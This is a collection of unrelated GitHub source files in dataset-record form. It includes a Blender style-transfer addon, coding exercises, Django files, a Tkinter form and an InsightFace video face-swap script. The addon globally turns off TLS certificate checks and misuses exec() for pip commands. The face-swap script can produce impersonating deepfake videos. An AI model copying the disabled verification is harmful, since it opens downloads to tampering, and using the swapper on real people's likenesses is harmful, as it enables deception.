bpy.utils.user_resource(\n 'SCRIPTS',\n \"addons\") + \"/\" + \"blender-pytorch-style-transfer/linux\" + \"/\" + \"torch-1.5.0-cp37-cp37m-linux_x86_64.whl\" + \"\\\" --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin/python3.7m\") + \"\\\"\" + \" -m pip install \" + \"\\\"\" + bpy.utils.user_resource(\n 'SCRIPTS',\n \"addons\") + \"/\" + \"blender-pytorch-style-transfer/linux\" + \"/\" + \"torchvision-0.6.0-cp37-cp37m-linux_x86_64.whl\" + \"\\\" --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin/python3.7m\") + \"\\\"\" + \" -m pip install Pillow --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n\nif platform.system() == \"Windows\":\n config_windows()\n\nif platform.system() == \"Linux\":\n config_linux()\n\n# Class For Textfield to images path's\nclass StyleTransfer_OT_TextField(bpy.types.Operator):\n bl_idname = \"view3d.textfield\"\n bl_label = \"Style Transfer\"\n bl_description = \"implement the Neural-Style algorithm developed by Leon A. Gatys, Alexander S. Ecker and Matthias Bethge. Neural-Style, or Neural-Transfer, allows you to take an image and reproduce it with a new artistic style. \"\n\n def execute(self, context):\n bpy.ops.import_test.some_data('INVOKE_DEFAULT')\n return {'FINISHED'}\n\n# Main Class whole addon is contained here\nclass StyleTransfer_OT_Operator(bpy.types.Operator):\n bl_idname = \"view3d.cursor_center\"\n bl_label = \"Simple operator\"\n bl_description = \"Center 3d cursor\"\n\n content = \"\"\n style = \"\"\n resolution = \"\"\n iterations = \"\"\n\n # image converter\n def im_convert(self, tensor):\n image = tensor.to(\"cpu\").clone().detach()\n image = image.numpy().squeeze()\n image = image.transpose(1, 2, 0)\n image = image * np.array((0.5, 0.5, 0.5)) + np.array((0.5, 0.5, 0.5))\n image = image.clip(0, 1)\n\n return image\n\n # main function\n def execute(self, context):\n # fix for linux ssl error in vgg downloading\n ssl._create_default_https_context = ssl._create_unverified_context\n\n # downloading and declaration of vgg19 model\n vgg19 = models.vgg19(pretrained=True).features\n\n # get number of iterations and resolution value from UI field\n iterations = int(self.iterations)\n resolution = int(self.resolution)\n\n # start loading indicator on cursor\n wm.progress_begin(0, iterations)\n\n for param in vgg19.parameters():\n param.requires_grad_(False)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n vgg19.to(device)\n\n # load image, resize to resolution set by UI and normalize it to tensor\n def load_image(img_path, max_size=resolution, shape=None):\n image = PIL.Image.open(img_path).convert('RGB')\n if max(image.size) > max_size:\n size = max_size\n else:\n size = max(image.size)\n\n if shape is not None:\n size = shape\n\n in_transform = transforms.Compose([\n transforms.Resize(size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5))])\n\n image = in_transform(image).unsqueeze(0)\n\n return image\n\n # load content from file\n self.content = bpy.path.abspath(self.content)\n self.content.replace('\\\\', '/')\n\n self.style = bpy.path.abspath(self.style)\n self.style.replace('\\\\', '/')\n\n c = load_image(self.content).to(device)\n s = load_image(self.style).to(device)\n\n # VGG19\n def features(image, model):\n\n layers = {'0': 'conv1_1', '5': 'conv2_1', '10': 'conv3_1', '19': 'conv4_1', '21': 'conv4_2',\n '28': 'conv5_1'}\n\n features = {}\n\n for name, layer in model._modules.items():\n image = layer(image)\n if name in layers:\n features[layers[name]] = image\n\n return features\n\n content_features = features(c, vgg19)\n style_features = features(s, vgg19)\n\n # Gram Matrix\n def gram(tensor):\n _, d, h, w = tensor.size()\n tensor = tensor.view(d, h * w)\n gram = torch.mm(tensor, tensor.t())\n return gram\n\n style_grams = {layer: gram(style_features[layer]) for layer in style_features}\n style_weights = {'conv1_1': 1.,\n 'conv2_1': 0.75,\n 'conv3_1': 0.2,\n 'conv4_1': 0.2,\n 'conv5_1': 0.2}\n\n content_weight = 1 # alpha\n style_weight = 1e6 # beta\n\n target = c.clone().requires_grad_(True).to(device)\n\n # set up optimizer\n optimizer = optim.Adam([target], lr=0.003)\n\n # main loop (for every iteration)\n for j in range(1, iterations + 1):\n # update progress indicator\n wm.progress_update(j)\n # get features from a target (content image)\n target_features = features(target, vgg19)\n #reset style loss\n style_loss = 0\n\n # inner loop (for every layer from VGG19) to count style loss\n # style loss i result of a combined loss from five different layers within our model\n for layer in style_weights:\n # collect target feature\n target_feature = target_features[layer]\n # apply gram matrix function to out target\n target_gram = gram(target_feature)\n # apply gram matrix function to out style\n style_gram = style_grams[layer]\n # depth, height, width\n _, d, h, w = target_feature.shape\n # calculate weighted average of loss\n style_loss += self.MSE(layer, style_gram, style_weights, target_gram) / (d * h * w)\n\n total_loss = content_weight * self.calc_content_loss(content_features, target_features) + style_weight * style_loss\n\n optimizer.zero_grad()\n total_loss.backward()\n optimizer.step()\n\n # Image information. Change these to your liking.\n NAME = 'Procedural Image'\n WIDTH = 64\n HEIGHT = 64\n USE_ALPHA = True\n newImage = bpy.data.images.new(NAME, WIDTH, HEIGHT, alpha=USE_ALPHA)\n\n wm.progress_end()\n\n im = Img.fromarray((self.im_convert(target) * 255).astype(np.uint8))\n\n # parse PIL Image to blender bpy.data\n im.save(self.content)\n newImage = bpy.data.images.load(self.content)\n newImage.update()\n\n # Make all UV/Image Editor views show the new image.\n for area in bpy.context.screen.areas:\n if area.type == 'IMAGE_EDITOR':\n for space in area.spaces:\n if space.type == 'IMAGE_EDITOR':\n space.image = newImage\n\n\n return {'FINISHED'}\n\n def MSE(self, layer, style_gram, style_weights, target_gram):\n return style_weights[layer] * torch.mean((target_gram - style_gram) ** 2)\n\n def calc_content_loss(self, content_features, target_features):\n return torch.mean((target_features['conv4_2'] - content_features['conv4_2']) ** 2)\n\n\n","repo_name":"pIuszak/blender-pytorch-style-transfer","sub_path":"style_transfer_op.py","file_name":"style_transfer_op.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44167582280","text":"\"\"\"\nhttps://docs.python.org/3/library/stdtypes.html#built-in-types\n\nFunções Built-in são funções nativas do python, ou seja, integradas (internas).\nExistem diversas funções built-in para diferentes tipos de dados.\nTambém é possível personalizar essas funções.\n\"\"\"\n\n# Imagine que queremos fazer uma calculadora simples que só realiza soma.\n# 1° Solução\n\nnum1 = input('Digite o 1° número: ')\nnum2 = input('Digite o 2° número: ')\n\nif num1.isnumeric() and num2.isnumeric(): # função bastante limitada\n print(int(num1) + int(num2))\nelse:\n print('Não foi possível converter os valores.')\n\n# 2° Solução\n\ntry:\n num1 = input('Digite o 1° número: ')\n num2 = input('Digite o 2° número: ')\n\n print(int(num1) + int(num2))\nexcept:\n print('Não foi possível converter os valores.')\n\n# 3° Solução\n\nimport re\n\ndef is_float(val):\n if isinstance(val, float): return True\n if re.search(r'^\\-{,1}[0-9]+\\.{1}[0-9]+$', val): return True\n \n return False\n \ndef is_int(val):\n if isinstance(val, int): return True\n if re.search(r'^\\-{,1}[0-9]+$', val): return True\n \n return False\n \ndef is_number(val):\n return is_int(val) or is_float(val)\n\n\nnum1 = input('Digite o 1° número: ')\nnum2 = input('Digite o 2° número: ')\n\nif is_number(num1) and is_number(num2): # função personalizada\n num1 = float(num1)\n num2 = float(num2)\n print(num1 + num2)\nelse:\n print('Não foi possível converter os valores.')\n ","repo_name":"WillJR183/python_learnings","sub_path":"python_basico_logica_programacao/aula13_funcoes_built_in.py","file_name":"aula13_funcoes_built_in.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24763490614","text":"## PSEUDO CODE####\n\nimport pandas as pd\n\ndef calc_nets(train_loader, net, optimizer, criterion):\n\n nets_df=pd.DataFrame()\n\n for train_sample in train_loader:\n optimizer.zero_grad()\n outputs = net(train_sample[0].cuda())\n loss = criterion(outputs[0], train_sample[1].cuda())\n loss.backward()\n\n grad=net.grads\n outputs=net.outputs\n preds=outputs\n\n temp_df=pd.DataFrame({'grad':grad, 'outputs':outputs, 'preds': preds})\n nets_df.append(temp_df)\n\n return nets_df\n\n## CREATE TRUE AND FALSE LABELS\n\n## LOSS\n## GRAD\n## PREDICTION\n## TRUE LABELS\n## LAYER","repo_name":"zhsegal/WhiteBox","sub_path":"calc_nets.py","file_name":"calc_nets.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29007455188","text":"# https://practice.geeksforgeeks.org/problems/add-1-to-a-number-represented-as-linked-list/1\n\n# Python3 recursive solution\n'''\nclass Node:\n def __init__(self, data): # data -> value stored in node\n self.data = data\n self.next = None\n'''\ndef addOne(head):\n def recursiveAdd(node): # recursively add 1 to the linked list\n if node is None:\n return 1\n carry = recursiveAdd(node.next)\n var = (node.data + carry) % 10\n carry = (node.data + carry) // 10\n node.data = var\n return carry\n \n carry = recursiveAdd(head)\n if carry: # if carry is left over (cases like 99999 + 1)\n node = Node(carry)\n node.next = head\n head = node\n return head\n\n# cpp solution using linked list reversal\n'''\n/* Node structure\nstruct Node {\n int data;\n Node* next;\n}; */\n\nNode* reverse(Node* head) {\n if (head == nullptr || head->next == nullptr)\n return head;\n Node* child = head->next;\n Node* var; head->next = nullptr;\n while (child != nullptr) {\n var = child->next;\n child->next = head;\n head = child;\n child = var;\n }\n return head;\n}\n\n// Returns new head of linked List.\nNode *addOne(Node *head) {\n head = reverse(head);\n Node* root = head;\n int carry = 1;\n while(root != nullptr) {\n int var = (root->data + carry) / 10;\n root->data = (root->data + carry) % 10;\n carry = var;\n if (root->next == nullptr)\n break;\n root = root->next;\n }\n \n if (carry > 0) {\n root->next = new Node;\n root->next->data = carry;\n }\n \n return reverse(head);\n}\n'''","repo_name":"harshraj22/problem_solving","sub_path":"solution/geeksforgeeks/Add1ToANumberRepresentedAsLinkedList.py","file_name":"Add1ToANumberRepresentedAsLinkedList.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"37636568941","text":"NO_PREDICTION_MODEL_SELECTED = \"Please select a prediction model!\"\nERROR_GET_MODEL_LIST_FAILED = \"Getting the prediction model list failed!\"\nERROR_GET_MODEL_DESCRIPTION_DETAILS_FAILED = (\n \"Getting the prediction model description failed!\"\n)\nERROR_PREDICTION_MODEL_FAILED = \"The selected prediction model is unable to start!\"\nERROR_REQUIRED_INPUT_NOT_FOUND = \"Please check all the input parameters! Missing:\"\nERROR_GET_DATA_FROM_FHIR_FAILED = (\n \"Please check the selected fhir endpoint or provided patient id!\"\n)\nERROR_INPUT_DATA_SAVE_FAILED = \"The model input cannot be saved, please inform IT!\"\nERROR_PROVIDED_SESSION_TOKEN_INVALID = \"The provided session token was not valid!\"\nERROR_PREDICTION_CALCULATION = \"Error in prediction calculation, please inform IT!\"\nERROR_UNKNOWN = \"Something went wrong please inform IT!\"\nWARNING_SESSION_ENDED = \"The advanced view feature is disabled for this session, please restart to enable this again.\"\n","repo_name":"MaastrichtU-CDS/cdse-core","sub_path":"predictionmodel/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6551840851","text":"# QUESTION 4.1:\n# I have a list of things I need to buy from my supermarket of choice.\n# shopping_list = [\n# \"oranges\",\n# \"cat food\",\n# \"sponge cake\",\n# \"long-grain rice\",\n# \"cheese board\",\n# ]\n#\n# print(shopping_list[1])\n#\n# I want to know what the first thing I need to buy is.\n# However, when I run the program it shows me a different answer to what I was expecting?\n# What is the mistake? How do I fix it?\n\n# ANSWER:\n# Change index from 1 to 0.\n# Indexes always start at 0, so shopping_list[0] will give first item.\n\nshopping_list = [\n \"oranges\",\n \"cat food\",\n \"sponge cake\",\n \"long-grain rice\",\n \"cheese board\",\n]\n\nprint(shopping_list[0])\n\n","repo_name":"NatalieJClark/pythonHomeworks","sub_path":"question4.1.py","file_name":"question4.1.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14106237784","text":"class Solution:\n def minFallingPathSum(self, matrix: List[List[int]]) -> int:\n def goDp(matrix, dp, x, y):\n if x == 0:return matrix[x][y]\n if dp[x][y] > -(101 * 101):return dp[x][y]\n minVal = 101 * 101\n for dy in [-1, 0, 1]:\n if y + dy < 0 or y + dy > len(matrix) - 1:continue\n minVal = min(minVal, matrix[x][y] + goDp(matrix, dp, x - 1, y + dy))\n dp[x][y] = minVal\n return minVal\n \n dp = [[-(101 * 101)] * len(matrix) for _ in range(len(matrix))]\n ans = 101 * 101\n for i in range(len(matrix)):\n ans = min(ans, goDp(matrix, dp, len(matrix) - 1, i))\n return ans","repo_name":"Sol-cito/LeetCoding","sub_path":"931-minimum-falling-path-sum/931-minimum-falling-path-sum.py","file_name":"931-minimum-falling-path-sum.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2857290066","text":"import csv\r\nfrom functools import partial\r\nimport pandas as pd\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport tkinter.messagebox\r\nimport os\r\nfrom time import strftime\r\nfrom datetime import datetime\r\nimport time\r\nimport pyrebase\r\nimport mysql.connector\r\nfrom PIL.ImageTk import PhotoImage\r\nfrom envVar import firebaseConfig as fc\r\n\r\n\r\nfirebase=pyrebase.initialize_app(fc)\r\ndb= firebase.database()\r\n\r\ndef back():\r\n root.destroy()\r\n import LoginPage\r\n\r\nroot=Tk()\r\nroot.geometry(\"1100x700+290+55\")\r\nroot.minsize(1100, 700)\r\nroot.maxsize(1100, 700)\r\nroot.configure(bg='navy')\r\nroot.title(\"Registration Page\")\r\np1 = PhotoImage(file='[DIGICURE MAIN LOGO].png')\r\nroot.iconphoto(FALSE, p1)\r\n#---Entry Format----#\r\nshop = StringVar()\r\npro = StringVar()\r\naddress = StringVar()\r\nmob = StringVar()\r\n#--Heading--#\r\nhead_frame = Frame(root, bg='DarkGoldenRod1', borderwidth=10, relief=RAISED, width=500, height=55)\r\nhead_frame.pack(side=TOP, fill=X)\r\nheading = Label(head_frame, text=\"----Please Fill The Details Below----\", bg='DarkGoldenRod1', fg='black', font=\"Helvetica 20 bold\")\r\nheading.pack()\r\n#---Main Content---#\r\nmain_frame = Frame(root, bg='DarkGoldenrod1', borderwidth=8, relief=SUNKEN, width=520, height=285)\r\nmain_frame.place(x=300, y=155)\r\nshopName = Label(main_frame, fg='black', bg='DarkGoldenRod1', font=\"Consolas 20 bold\", text=\"Shop Name:-\")\r\nshopName.place(x=10, y=25)\r\nshopEntry = Entry(main_frame, borderwidth=4, relief=RIDGE, font=\"Helvetica 18 bold\", width=20)\r\nshopEntry.place(x=210, y=25)\r\npropName = Label(main_frame, fg='black', bg='DarkGoldenRod1', font=\"Consolas 20 bold\", text=\"Proprietor:-\")\r\npropName.place(x=10, y=85)\r\npropEntry = Entry(main_frame, borderwidth=4, relief=RIDGE, font=\"Helvetica 18 bold\", width=20)\r\npropEntry.place(x=210, y=85)\r\naddress = Label(main_frame, fg='black', bg='DarkGoldenRod1', font=\"Consolas 20 bold\", text=\"Address:-\")\r\naddress.place(x=10, y=145)\r\naddEntry = Entry(main_frame, borderwidth=4, relief=RIDGE, font=\"Helvetica 18 bold\", width=20)\r\naddEntry.place(x=210, y=145)\r\nmobile = Label(main_frame, fg='black', bg='DarkGoldenRod1', font=\"Consolas 20 bold\", text=\"Mobile No.:-\")\r\nmobile.place(x=10, y=205)\r\nmobEntry = Entry(main_frame, borderwidth=4, relief=RIDGE, font=\"Helvetica 18 bold\", width=20)\r\nmobEntry.place(x=210, y=205)\r\n\r\nReg_btn_frame = Frame(root, borderwidth=6, relief=SUNKEN, bg=\"DarkGoldenrod1\")\r\nReg_btn_frame.place(x=490, y=490)\r\nReg_btn = Button(Reg_btn_frame, text=\"Register\", bg=\"navy\", borderwidth=4, relief=RIDGE,\r\n font=\"Arial 18 bold\", fg='DarkGoldenrod1', command=None)\r\nReg_btn.pack()\r\n\r\nback_btn_frame = Frame(root, borderwidth=4, relief=SUNKEN, bg=\"DarkGoldenrod1\")\r\nback_btn_frame.place(x=1, y=55)\r\nback_btn = Button(back_btn_frame, text=\"Back\", bg=\"navy\", borderwidth=2, relief=RIDGE,\r\n font=\"Arial 18 bold\", fg='DarkGoldenrod1', command=back).pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"aritraM23/Fund-Management-System","sub_path":"DataEntry.py","file_name":"DataEntry.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36531651433","text":"import numpy as np\nfrom FinalChallengePy.Utils.GeomUtils import GeomUtils\n\nclass LocalGlobalUtils:\n @staticmethod\n def globalToLocal(state, globalPoint):\n translatedPoint = globalPoint - state.getPosition()\n\n # rotate into the up frame of reference\n angle = np.arccos(state.getOrientation()[1]) \\\n * np.sign(state.getOrientation()[0])\n\n return GeomUtils.rotateVector(translatedPoint, angle)\n\n @staticmethod\n def localToGlobal(state, localPoint):\n angle = - np.arccos(state.getOrientation()[1]) \\\n * np.sign(state.getOrientation()[0])\n\n translatedPoint = GeomUtils.rotateVector(localPoint, angle)\n\n return translatedPoint + state.getPosition()\n","repo_name":"sportdeath/maze_solver","sub_path":"src/maze_solver/utils/LocalGlobalUtils.py","file_name":"LocalGlobalUtils.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38557100384","text":"import cv2\nimport numpy as np\nimport insightface\nimport os\nimport torch\nfrom numpy.linalg import norm\nfrom insightface.app import FaceAnalysis\nfrom moviepy.editor import *\n\ndef create_directories(output_folder, final_output_folder):\n dir_names = [output_folder, final_output_folder]\n for dir_name in dir_names:\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n print(f\"Directory {dir_name} created.\")\n else:\n print(f\"Directory {dir_name} already exists.\")\n\ndef initialize_insightface(model_path):\n app = FaceAnalysis(providers=['CUDAExecutionProvider', 'CPUExecutionProvider'])\n app.prepare(ctx_id=0, det_size=(640, 640))\n swapper = insightface.model_zoo.get_model(model_path, download=False, download_zip=False)\n return app, swapper\n\nfrom concurrent.futures import ThreadPoolExecutor\n\n\n\ndef process_frame(frame, frame_count, output_folder, app, swapper, source_face, frame_photo_face_features):\n faces = app.get(frame)\n for face in faces:\n face_features = face.normed_embedding\n\n # Calculate cosine similarity\n similarity = np.dot(face_features, frame_photo_face_features.T) / (norm(face_features) * norm(frame_photo_face_features))\n\n # Adjust the threshold for cosine similarity (you may need to experiment with this value)\n if similarity > 0.3: \n frame = swapper.get(frame, face, source_face[0], paste_back=True)\n\n frame_filename = os.path.join(output_folder, f\"frame_{frame_count}.png\")\n cv2.imwrite(frame_filename, frame)\n\ndef read_and_process_video(video_path, output_folder, app, swapper, source_face_dict):\n cap = cv2.VideoCapture(video_path)\n if not cap.isOpened():\n print(\"Error: Could not open video.\")\n return\n\n frame_count = 0\n while True:\n ret, frame = cap.read()\n if not ret:\n print(\"Video has ended.\")\n break\n\n all_faces_similar = True # Initialize flag to True for each frame\n\n faces = app.get(frame)\n for face in faces:\n face_features = face.normed_embedding\n face_similar = False # Initialize a flag for individual face similarity\n\n for frame_photo_name, (source_face, frame_photo_face_features) in source_face_dict.items():\n #similarity = np.dot(face_features, frame_photo_face_features.T)\n similarity = np.dot(face_features, frame_photo_face_features.T) / (norm(face_features) * norm(frame_photo_face_features))\n if similarity > 0.3:\n frame = swapper.get(frame, face, source_face[0], paste_back=True)\n face_similar = True # Set individual face similarity flag to True\n break # No need to check further for this face\n\n if not face_similar: # If this face is not similar to any source face\n all_faces_similar = False # Set the overall frame flag to False\n break # No need to check further for this frame\n\n if all_faces_similar: # If all faces in the frame are similar to some source face\n frame_filename = os.path.join(output_folder, f\"frame_{frame_count}.png\")\n cv2.imwrite(frame_filename, frame)\n frame_count += 1\n\n cap.release()\n cv2.destroyAllWindows()\n\n\ndef process_single_image(image_path, output_folder, app, swapper, source_face_dict):\n img = cv2.imread(image_path)\n if img is None:\n print(\"Error: Could not read image.\")\n return\n\n faces = app.get(img)\n for face in faces:\n face_features = face.normed_embedding\n for frame_photo_name, (source_face, frame_photo_face_features) in source_face_dict.items():\n similarity = np.dot(face_features, frame_photo_face_features.T)\n if similarity > 0.5:\n img = swapper.get(img, face, source_face[0], paste_back=True)\n\n output_filename = os.path.join(output_folder, \"output_image.png\")\n cv2.imwrite(output_filename, img)\n\ndef reassemble_video(output_folder, original_video_path, final_output_folder):\n # Get frame rate of original video\n cap = cv2.VideoCapture(original_video_path)\n if not cap.isOpened():\n print(\"Error: Could not open original video.\")\n return\n frame_rate = int(cap.get(cv2.CAP_PROP_FPS))\n cap.release()\n\n # Get dimensions of the first frame\n first_frame_path = os.path.join(output_folder, \"frame_0.png\")\n img = cv2.imread(first_frame_path)\n if img is None:\n print(\"Error: Could not read the first frame.\")\n return\n height, width, _ = img.shape\n\n # Initialize VideoWriter with the path in the final_output_folder\n output_file_path = os.path.join(final_output_folder, 'output_video.mp4')\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter('temp_video.mp4', fourcc, frame_rate, (width, height))\n\n frame_count = len([name for name in os.listdir(output_folder) if os.path.isfile(os.path.join(output_folder, name))])\n\n # Write frames into the video\n for i in range(frame_count):\n frame_path = os.path.join(output_folder, f\"frame_{i}.png\")\n frame = cv2.imread(frame_path)\n if frame is None:\n print(f\"Error: Could not read frame_{i}. Skipping this frame.\")\n continue\n out.write(frame)\n\n out.release()\n\n # Extract audio from the original video\n video = VideoFileClip(original_video_path)\n audio = video.audio\n audio.write_audiofile(\"temp_audio.mp3\")\n\n # Merge audio and reassembled video\n final_video = VideoFileClip(\"temp_video.mp4\")\n final_video = final_video.set_audio(AudioFileClip(\"temp_audio.mp3\"))\n final_video.write_videofile(output_file_path) # Changed to output_file_path\n\n # Remove temporary files\n os.remove(\"temp_video.mp4\")\n os.remove(\"temp_audio.mp3\")\n\n print(\"Video reassembled successfully with audio.\")\n\n\ndef clear_gpu_memory(app, swapper):\n del app\n del swapper\n torch.cuda.empty_cache()\n\nimport argparse\n\ndef main(args):\n \n\n app, swapper = initialize_insightface(args.model_path)\n\n source_face_dict = {}\n for source_img_path, frame_img_path in zip(args.source_images, args.frame_images):\n source_img = cv2.imread(source_img_path)\n source_face = app.get(source_img)\n frame_photo = cv2.imread(frame_img_path)\n frame_photo_face = app.get(frame_photo)\n frame_photo_face_features = frame_photo_face[0].normed_embedding\n source_face_dict[frame_img_path] = (source_face, frame_photo_face_features)\n\n output_folder = args.output_folder\n final_output_folder = args.final_output_folder\n create_directories(output_folder,final_output_folder)\n\n if args.process_type == \"video\":\n read_and_process_video(args.video_path, output_folder, app, swapper, source_face_dict)\n reassemble_video(output_folder, args.video_path, args.final_output_folder)\n elif args.process_type == \"image\":\n process_single_image(args.image_path, output_folder, app, swapper, source_face_dict)\n\n clear_gpu_memory(app, swapper)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Face Swapping Script')\n parser.add_argument('--model_path', type=str, help='Path to the model')\n parser.add_argument('--source_images', type=str, nargs='+', help='Paths to source images')\n parser.add_argument('--frame_images', type=str, nargs='+', help='Paths to frame images')\n parser.add_argument('--output_folder', type=str, help='Path to output frames folder')\n parser.add_argument('--final_output_folder', type=str, help='Path to final output folder')\n parser.add_argument('--video_path', type=str, help='Path to the video file')\n parser.add_argument('--image_path', type=str, help='Path to the image file')\n parser.add_argument('--process_type', type=str, choices=['video', 'image'], help='Type of processing: \"video\" or \"image\"')\n\n args = parser.parse_args()\n main(args)\n","repo_name":"allthingssecurity/anukriti","sub_path":"anukriti.py","file_name":"anukriti.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37036588709","text":"from django.urls import path\n\nfrom webapp.views import IndexView, AdCreateView, AdToDeleteView, DeactivatedListView, AdActivateView, AdListView, \\\n AdToDeleteFromListView\n\napp_name = 'webapp'\n\n\nurlpatterns = [\n path('', IndexView.as_view(), name='index'),\n path('ad_create//', AdCreateView.as_view(), name='ad_create'),\n path('ad_to_delete//', AdToDeleteView.as_view(), name='ad_to_delete'),\n path('ad_to_delete_from_list//', AdToDeleteFromListView.as_view(), name='ad_to_delete_from_list'),\n path('ad_activate//', AdActivateView.as_view(), name='ad_activate'),\n path('deactivated/', DeactivatedListView.as_view(), name='deactivated_list'),\n path('ad_list/', AdListView.as_view(), name='ad_list'),\n\n # path('product/add/', ProductCreateView.as_view(), name='product_create'),\n # path('product//update/', ProductUpdateView.as_view(), name='product_update'),\n # path('product//delete/', ProductDeleteView.as_view(), name='product_delete'),\n # path('product_category/', ProductListView.as_view(), name='products_category'),\n # path('product_sub_category/', ProductSubCategoryListView.as_view(), name='products_sub_category'),\n # path('product_list/', ProductListGetView.as_view(), name='products_list_get'),\n # path('product/add-to-favorites/', AddToFavorites.as_view(), name='add_to_favorites'),\n # path('product/delete-from-favorites/', DeleteFromFavorites.as_view(), name='delete_from_favorites'),\n # path('products_favorites/', FavoritesList.as_view(), name='favorite_products'),\n # path('product/add-to-offer/', AddToOffer.as_view(), name='add_to_offer'),\n # path('product/delete-from-offer/', DeleteFromOffer.as_view(), name='delete_from_offer'),\n # path('products_in_offer/', ProductsOfferListView.as_view(), name='offer_products'),\n]","repo_name":"aydarbekov/bizbirge.biz","sub_path":"source/webapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44234097907","text":"def decodeString(s):\n limiter = {'open': '[', 'close': ']'}\n stack = []\n n = len(s)\n\n for i in range(n):\n if s[i] == limiter['close']:\n temp = ''\n\n while stack[-1] != limiter['open']:\n temp = stack.pop() + temp\n\n stack.pop()\n\n n = ' '\n while len(stack) and stack[-1].isnumeric():\n n = stack.pop() + n\n n = int(n)\n\n temp = temp * n\n stack.append(temp)\n else:\n stack.append(s[i])\n\n return stack[0]\n\n\nif __name__ == '__main__':\n print(decodeString('2[a2[b]c]'))\n # abbcabbc\n","repo_name":"silvioedu/TechSeries-Daily-Interview","sub_path":"day59/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70310284994","text":"\"\"\"\nWell describe in https://www.youtube.com/watch?v=kHWy5nEfRIQ\n\"\"\"\nfrom algo import dynamic_programming\n\n\nclass NativeSolution(object):\n @staticmethod\n def next_step(current, towers):\n \"\"\"\n The following algorithm will try to identify the next best step\n :param current:\n :param towers:\n :return:\n \"\"\"\n # print(\">>>> {}->{} of {}\".format(current, towers[current], towers))\n\n # check if the next jump already capable for passing the entire list\n if current + towers[current] >= len(towers):\n return current + towers[current]\n\n # create a new sub list from the current -> farest jump by current value\n sub = towers[current + 1: current + towers[current] + 1]\n # create new list calculating each entity with the position and value\n options = []\n for i, v in enumerate(sub):\n if v == 0:\n options.append(v)\n else:\n options.append(v + i)\n\n # if new list is not empty calculate the new current by adding the max value position to the current position\n if options:\n sub_next = options.index(max(options))\n current += sub_next + 1\n\n # print(\"sub {} options {} best {}\".format(sub, options, current))\n return current\n\n\n @staticmethod\n def is_hopable(towers):\n \"\"\"\n Check if a given seq can be hap till user in position 0 will be able to jump outside the seq\n :param towers: list of integers describes set of towers\n :return: Boolean\n \"\"\"\n\n # assumptions: List can't be empty or start with zero\n if len(towers) == 0 or towers[0] == 0:\n return False\n\n print(\"Testing {}\".format(towers))\n current = 0\n count = 0\n while True:\n if current >= len(towers):\n print(\"hopping with {} numbers of jumps\".format(count))\n return True\n if towers[current] == 0:\n return False\n count += 1\n current = NativeSolution.next_step(current, towers)\n\n\nclass GraphDFSSolution(object):\n \"\"\"\n # http://eddmann.com/posts/depth-first-search-and-breadth-first-search-in-python/\n # https://gist.github.com/professormahi/cff4bfeaece05966e688658127bf41f3\n\n Graph approach (https://www.youtube.com/watch?v=zaBhtODEL0w)\n DFS (Depth First Search)\n it dive deep into each root tree and ask hasPath(s, t)\n The major disadvantage is that we might end up diving into one root when we have the node we are looking\n for right at the second root\n Implementation: simple recursive alorithem passing \"is_visited\" flag to avoid infinit loop\n \"\"\"\n @staticmethod\n def is_hopable(towers):\n pass\n\n\nclass GraphBFSSolution(object):\n \"\"\"\n # http://eddmann.com/posts/depth-first-search-and-breadth-first-search-in-python/\n # https://gist.github.com/professormahi/cff4bfeaece05966e688658127bf41f3\n \n BFS Breadth First Search\n Go wider before we go deep and that we do by asking fist child if onw of his direct children is\n the node we are looking for.\n Implementation: using \"queue\" once asking all the direct children, we add them to the queue\n \"\"\"\n @staticmethod\n def is_hopable(towers):\n pass\n\n\nclass DynamicProgrammingSolution(object):\n \"\"\"\n The classic question is \"minimum numbers of jumps to get the end ...\n could be found in https://www.geeksforgeeks.org/minimum-number-of-jumps-to-reach-end-of-a-given-array/\n We added small change to make it serve our purpose\n\n Time Complexity: O(n^2)\n \"\"\"\n @staticmethod\n @dynamic_programming\n def is_hopable(towers):\n # converting classic \"min jumps to index...\" algorithm into our is_happable requirements\n towers.append(0)\n n = len(towers)\n jumps = [0 for _ in range(n)]\n\n if (n == 0) or 